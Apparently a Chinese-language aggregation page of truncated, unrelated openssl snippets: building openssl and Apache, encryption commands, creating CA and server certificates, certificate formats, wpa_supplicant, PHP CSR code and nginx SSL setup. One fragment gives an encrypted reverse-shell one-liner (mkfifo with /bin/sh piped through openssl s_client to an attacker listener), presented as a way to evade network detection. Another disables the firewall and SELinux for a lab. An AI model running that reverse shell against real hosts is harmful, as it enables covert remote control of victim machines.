openssl生成证书

制作证书： 参考： linux下运用opensll制作ssl证书 生成三个证书 server.crt 、server-ca.crt、server.key 安装openssl tar -xzvf openssl-1.0.2h.tar.gz cd openssl-1.0.2h ./config -fPIC enable-shared make depend make && make install make clean && make distclean #openssl类库做软连接 ln -s /usr/local/ssl//lib/*.so.* /usr/lib64 ln -s /usr/local/ssl//lib/*.so.* /usr/lib 安装apache apache依赖包安装不详细说明， tar xvzf httpd-2.4.18.tar.gz cd httpd-2.4.18 ./configure \ --prefix=/usr/local/cp-httpd-2.4.18 \ --with-apr=/usr/local/cp-apr-1.5.2 \ --with-apr-util=/usr/local/cp-apr-util-1.5.4 \ --with-apr-iconv=/usr/local/cp-apr-iconv-1.2.1 \ --with-ssl=

openssl openssl是个密码工具集，提供多端接口调用方式 组成: 1. 代码库 libcryto ,libssl(ssl/tls) 2. 工具集 openssl 对称加密主要是用aes，des算法 需要注意的是解密不要在源文件操作，否则解密失败源文件也没有了 usage: enc -ciphername [-AadePp] [-base64] [-bufsize number] [-debug] [-in file] [-iv IV] [-K key] [-k password] [-kfile file] [-md digest] [-none] [-nopad] [-nosalt] [-out file] [-pass arg] [-S salt] [-salt] -e 指定加密算法 -d 解密 -a 使用base64编码 -base64 使用base64解码 -in 要加密文件存放位置 -out 加密后的文件存放位置 -k 输入密码 -iv 输入一个向量 加密 $ openssl enc -e aes-128-cbc -in secret.txt -out myAes128.txt 解密 $ openssl enc -d aes-128-cbc -in myAes128.txt -out 使用最多的是sha256,sha512,hmac md5不再推荐使用

#生成根证书的秘钥对（私钥+公钥） openssl genrsa -out ca.key 4096 #生成根证书 openssl req -new -x509 -days 3650 -key ca.key -out ca.crt ################################################################################################################# #生成server端证书的秘钥对 openssl genrsa -out server.pem 4096 #提取公钥 openssl rsa -in server.pem -out server.key #生成签名请求 openssl req -new -key server.pem -out server.csr #使用根证书签名 openssl x509 -req -sha512 -in server.csr -CA ca.crt -CAkey ca.key -CAcreateserial -days 3650 -out server.crt ##############################################################################################

目录 0x01 简介 0x02 使用openssl反弹加密shell 0x01 简介 使用常规NC或者其他常规的方法反弹shell，由于流量都是明文的，很容易被网络防御设备检测到，因此需要对传输内容进行混淆或者加密。并且几乎每一个https都有openssl库，方便我们使用openssl反弹shell。下面将在linux下进行演示。 0x02 使用openssl反弹加密shell linux 2.1 生成密钥 openssl req -x509 -newkey rsa:2048 -keyout key.pem -out cert.pem -days 365 -nodes 自生成密钥会提示输入证书信息，如果懒人就可以一路回车。回在本目录下生成文件 key.pem cert.pem 启动监听 openssl s_server -quiet -key key.pem -cert cert.pem -port 23 此时在攻击机23端口上启动了SSL/server服务 2.2 受害主机上反弹加密shell mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect 192.168.30.119:23 > /tmp/s; rm /tmp/s tips: 1.需要注意的是

1、X.509标准 x509是由国际电信联盟(ITU-T)制定的数字证书标准；包含公钥和用户标志符、CA等； x509是数字证书的规范，P7和P12是两种封装形式；X.509是常见通用的证书格式。所有的证书都符合为Public key Infrastructure 制定的ITU-T x509国际标准。 PKCS # 7常用的后缀是： P7B， P7C， SPC PKCS # 12常用的后缀有： P12 ，PFX X．509 DER编码（ASCII）的后缀是： DER CER CRT X．509PEM编码（base64）的后缀是：PEM CER　CRT pem格式是经过base64编码的证书，der格式是DER编码的证书； 证书入和导出操作支持四种文件格式。 个人信息交换 (PKCS #12) 个人信息交换格式（PFX，也称为 PKCS #12）支持安全存储证书、私钥和证书路径中的所有证书。PKCS #12 是唯一可用于导出证书及其私钥的文件格式。 加密消息语法标准 (PKCS #7) PKCS #7 格式支持存储证书和证书路径中的所有证书 DER 编码的二进制 X.509 区别编码规则 (DER) 格式支持存储单个证书。该格式不支持存储私钥或证书路径。 Base64 编码的 X.509 Base64 格式支持存储单个证书。该格式不支持存储私钥或证书路径。 cer/crt证书：

基于ubuntu的wpa_supplicant工具的安装与使用 wpa_supplicant是WPA Supplicant组件的一个实现，即在客户站中运行的部分。它实现了WPA密钥与WPA认证者进行协商并使用EAP进行身份验证认证服务器。另外，它控制着漫游和IEEE802.11认证/关联的WLAN驱动程序。 wpa_supplicant被设计成一个运行在后台的守护进程，并充当控制无线连接的后端组件。wpa_supplicant包含一个支持单独的前端程序和一个示例基于文本的前端wpa_cli 使用WPA与AP关联时，使用以下步骤： - wpa_supplicant请求内核驱动程序扫描相邻的BSS - wpa_supplicant根据配置选择BSS - wpa_supplicant请求内核驱动程序关联所选内容 BSS - 如果WPA-EAP：集成IEEE 802.1X请求者完成EAP 认证服务器认证（由代理服务器代理） AP中的身份验证器） - 如果从IEEE 802.1X请求者收到WPA-EAP：主密钥 - 如果WPA-PSK：wpa_supplicant使用PSK作为主会话密钥 - wpa_supplicant完成WPA 4次握手和组密钥握手 与认证者（AP） - wpa_supplicant为单播和广播配置加密密钥 - 可以发送和接收正常的数据包 第一章 安装 Wpa

<?php 2 //配置信息 3 $dn = array( 4 "countryName" => "GB", 5 "stateOrProvinceName" => "Somerset", 6 "localityName" => "Glastonbury", 7 "organizationName" => "The Brain Room Limited", 8 "organizationalUnitName" => "PHP Documentation Team", 9 "commonName" => "Wez Furlong", 10 "emailAddress" => "wez@example.com" 11 ); 12 13 $config = array( 14 "private_key_bits" => 512, //指定应该使用多少位来生成私钥 512 1024 2048 4096等 15 "private_key_type" => OPENSSL_KEYTYPE_RSA, //选择在创建CSR时应该使用哪些扩展。可选值有 OPENSSL_KEYTYPE_DSA, OPENSSL_KEYTYPE_DH, OPENSSL_KEYTYPE_RSA 或 OPENSSL_KEYTYPE_EC. 默认值是 OPENSSL_KEYTYPE_RSA. 16 ); 17 // 生成证书

对称加密算法 1 对称加密：加密和解密使用同一个密钥 2 DES：Data Encryption Standard，56bits 3 3DES： 4 AES：Advanced (128, 192, 256bits) 5 Blowfish，Twofish 6 IDEA，RC6，CAST5 7 特性： 8 1、加密、解密使用同一个密钥，效率高 9 2、将原始数据分割成固定大小的块，逐个进行加密 10 缺陷： 11 1、密钥过多 12 2、密钥分发 13 3、数据来源无法确认 非对称加密算法 1 公钥加密：密钥是成对出现 2 公钥：公开给所有人；public key 3 私钥：自己留存，必须保证其私密性；secret key 4 特点：用公钥加密数据，只能使用与之配对的私钥解密；反之亦然 5 功能： 6 数字签名：主要在于让接收方确认发送方身份 7 对称密钥交换：发送方用对方的公钥加密一个对称密钥后发送给对方 8 数据加密：适合加密较小数据 9 缺点：密钥长，加密解密效率低下 10 算法： 11 RSA（加密，数字签名） 12 DSA（数字签名） 13 ELGamal 单向散列（hash算法） 1 将任意数据缩小成固定大小的“指纹” 2 任意长度输入 3 固定长度输出 4 若修改数据，指纹也会改变（“不会产生冲突”） 5 无法从指纹中重新生成数据（“单向”） 6 功能：数据完整性 7

一、搭建私有CA服务器 1、安装包 # yum -y install openssl 2、生成密钥对儿 # cd /etc/pki/CA # (umask 077;openssl genrsa -out private/cakey.pem 2048) 说明：（）表示为子shell中执行,直接生成权限600的文件，666-077 3、生成CA自签证书(CA的根证书)： # openssl req -new -x509 -key private/cakey.pem -out cacert.pem -days 3655 -new：生成新证书签署请求 -x509：专用于CA生成自签证书 -key：生成请求用到的私钥文件 -days n：证书的有限期限 -out / PATH/TO/SOMECERTFIL E：证书的保存路径,路径是根据/etc/pki/tls/openssl.cnf定的 4、CA目录下创建需要的文件： # touch index.txt serial crlnumber # echo 01 > serial 参考命令 yum -y install openssl cd /etc/pki/CA (umask 077;openssl genrsa -out private/cakey.pem 2048) openssl req -new -x509 -key private

实验环境： 1.首先确保机器已安装nginx服务 rpm -q nginx 2.关闭防火墙及Linux安全机制 systemctl stop firewalld.service iptables -F setenforce 0 3.使用nginx -V命令查看nginx是否支持ssl 查看 configure arguments 信息中是否包含 -with-http_ssl_module 字样，如果没有则需要重新编译安装。 1）创建证书索引数据库文件 touch /etc/pki/CA/index.txt 2）指定第一个颁发证书的序列号 echo 01 > /etc/pki/CA/serial 1）生成CA私钥 cd /etc/pki/CA umask 066 openssl genrsa -out /etc/pki/CA/private/cakey.pem 2048 2） 生成CA自签名证书 openssl req -new -x509 -key /etc/pki/CA/private/cakey.pem -days 7300 -out /etc/pki/CA/cacert.pem （回到根目录下） -new: 生成新证书签署请求 -x509: 专用于 CA 生成自签证书 -key: 生成请求时用到的私钥文件 -days n：证书的有效期限 -out: 证书的保存路径